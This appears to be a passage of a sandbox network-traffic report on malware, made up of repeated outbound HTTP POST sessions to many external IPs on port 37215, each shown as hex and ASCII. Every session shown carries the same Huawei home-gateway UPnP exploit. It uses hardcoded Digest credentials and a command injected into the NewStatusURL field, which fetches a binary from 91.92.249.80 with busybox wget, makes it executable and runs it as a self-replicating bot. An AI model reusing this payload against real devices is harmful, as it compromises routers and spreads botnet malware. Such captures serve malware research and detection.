                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1602192.168.2.234783441.158.90.25137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497771025 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1603192.168.2.2339288197.177.149.24237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497807980 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1604192.168.2.2352258133.28.217.2737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497817039 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1605192.168.2.234359041.212.183.7737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497838020 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1606192.168.2.235454841.88.82.11337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497870922 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1607192.168.2.2341816157.64.44.5337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497879028 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1608192.168.2.2351904157.190.133.20037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497950077 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1609192.168.2.234047041.107.94.16437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.498035908 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1610192.168.2.234337446.225.173.3837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.498155117 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1611192.168.2.2357716157.226.255.16937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.498166084 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
